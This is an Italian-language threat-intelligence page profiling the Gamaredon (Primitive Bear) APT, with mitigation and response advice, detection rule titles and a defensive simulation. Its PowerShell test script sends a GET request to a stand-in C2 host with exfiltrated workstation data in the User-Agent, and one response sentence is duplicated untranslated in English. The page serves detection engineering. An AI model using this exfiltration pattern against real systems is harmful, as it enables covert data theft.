SOC Prime Bias: Critico

13 Jul 2026 15:41 UTC

Profilo APT di Gamaredon (Primitive Bear) con Mapping MITRE ATT&CK

Author Photo
SOC Prime Team linkedin icon Segui
Profilo APT di Gamaredon (Primitive Bear) con Mapping MITRE ATT&CK
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sintesi

Gamaredon è un gruppo di minacce persistenti avanzate allineato alla Russia attivo dal 2013 e attribuito all’FSB russo. Il gruppo è focalizzato sul cyber spionaggio e sul furto di dati, con un obiettivo principale rivolto verso le organizzazioni governative e di difesa ucraine. Le sue operazioni si basano su famiglie di malware personalizzati come GammaLoad e GammaSteel, supportate da una serie di metodi di offuscamento e persistenza.

Indagine

Il rapporto esamina le campagne che vanno dal 2013 al 2025 e mette in evidenza il passaggio del gruppo all’uso di Cloudflare Workers, API di Telegram e lo sfruttamento delle vulnerabilità di WinRAR. Traccia anche la progressione di Gamaredon dai dropper VBScript personalizzati a infostealer più avanzati basati su PowerShell e spyware mobili.

Mitigazione

Le mitigazioni raccomandate includono l’applicazione di patch a WinRAR per affrontare CVE-2025-8088 e il monitoraggio dell’esecuzione sospetta di PowerShell. Le organizzazioni dovrebbero anche imporre controlli rigorosi sui supporti rimovibili, osservare compiti pianificati insoliti e convalidare i controlli difensivi contro i TTP noti di Gamaredon attraverso piattaforme di simulazione e test.

Risposta

Se viene rilevata un’attività di Gamaredon, i risponditori dovrebbero isolare immediatamente gli host colpiti, specialmente i sistemi che mostrano segnali di GammaSteel o attività di malware Ptero*. Gli investigatori dovrebbero esaminare la persistenza basata su registro, ispezionare i compiti pianificati per voci non autorizzate e condurre una ricerca ampia per traffico uscente sospetto verso infrastrutture legate a Cloudflare o Telegram. malware activity. Investigators should review registry-based persistence, inspect scheduled tasks for unauthorized entries, and conduct a broad hunt for suspicious outbound traffic to Cloudflare or Telegram-linked infrastructure.

Flusso di Attacco

Rilevamenti

Chiamata di Metodi .NET Sospetti da Powershell (via powershell)

Squadra SOC Prime
13 Lug 2026

Punti di Persistenza Possibili [ASEPs – Software/NTUSER Hive] (via registry_event)

Squadra SOC Prime
13 Lug 2026

Possibile Esfiltrazione di Dati tramite Strumento Rclone (via cmdline)

Squadra SOC Prime
13 Lug 2026

Download o Upload via Powershell (via cmdline)

Squadra SOC Prime
13 Lug 2026

Chiamata di Classi/Metodi .NET Sospetti dalla riga di comando di Powershell (via process_creation)

Squadra SOC Prime
13 Lug 2026

Schtasks Punta a Directory / Binario / Script Sospetti (via cmdline)

Squadra SOC Prime
13 Lug 2026

LOLBAS WScript / CScript (via process_creation)

Squadra SOC Prime
13 Lug 2026

Comportamento di Evasione dalla Difesa di LOLBAS MSHTA Sospetto rilevato tramite i comandi associati (via process_creation)

Squadra SOC Prime
13 Lug 2026

Binari / Script Sospetti nella posizione di avvio automatico (via file_event)

Squadra SOC Prime
13 Lug 2026

Tentativo di Sfruttamento della Vulnerabilità CVE-2025-8088 / CVE-2025-6218 (WinRAR) (via file_event)

Squadra SOC Prime
13 Lug 2026

Possibile Servizio DNS Dinamico Contattato (via dns)

Squadra SOC Prime
13 Lug 2026

Rilevamento di Richieste GET di GammaLoad di Gamaredon con Esfiltrazione di User-Agent [Connessione di Rete Windows]

Regole AI di SOC Prime
13 Lug 2026

Downloader PowerShell tramite Collegamento LNK con Offuscamento [PowerShell di Windows]

Regole AI di SOC Prime
13 Lug 2026

## Esecuzione della Simulazione

Prerequisito: Il Controllo preliminare Telemetria & Baseline deve essere superato.

Rationale: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirare a generare esattamente la telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a errori di diagnosi.

  • Narrativa & Comandi dell’Attacco: Un avversario ha stabilito una posizione su WORKSTATION01. Per esfiltrare i metadati del sistema (come nomi host o nomi utenti) senza attivare tradizionali DLP basati su file, utilizzano un’implementazione personalizzata del malware GammaLoad. Questo malware esegue richieste HTTP GET a un server di Comando & Controllo (C2) remoto. Invece di inserire i dati nell’URI o nel corpo del POST, il malware incorpora l’identità codificata della workstation nell’intestazione User-Agent : ::WORKSTATION01_encoded_data. In questo modo i dati bypassano il semplice filtraggio degli URL rimanendo nascosti nel traffico web standard.

  • Script di Test di Regressione: Questo script utilizza PowerShell per simulare la specifica richiesta HTTP GET con la stringa User-Agent dannosa necessaria per attivare la regola.

    # Simulazione di Esfiltrazione User-Agent di GammaLoad
    $TargetUrl = "http://example-c2-server.com/api/check"
    $MaliciousUA = "::WORKSTATION01_V3_DATA_EXFIL_TEST"
    
    Write-Host "[*] Avvio della simulazione: Invio richiesta GET con User-Agent dannoso..." -ForegroundColor Cyan
    
    try {
        $response = Invoke-WebRequest -Uri $TargetUrl -UserAgent $MaliciousUA -Method GET
        Write-Host "[+] Richiesta inviata con successo. Controllare SIEM per avviso." -ForegroundColor Green
    }
    catch {
        # Ci aspettiamo un errore di connessione se l'URL non esiste, 
        # ma l'User-Agent sarà comunque loggato dal proxy.
        Write-Host "[!] Tentativo di richiesta (Nota: Ci si aspetta un errore di connessione se l'URL è non valido, ma i log del proxy dovrebbero comunque catturare l'UA)." -ForegroundColor Yellow
    }
  • Comandi di Pulizia: Poiché questa simulazione genera solo traffico di rete transitorio e non modifica i file di sistema o le chiavi di registro, non è richiesta alcuna pulizia.

    # Nessuna modifica al sistema eseguita. Simulazione completata.
    Write-Host "[*] Pulizia: Nessuna traccia lasciata sull'host." -ForegroundColor Green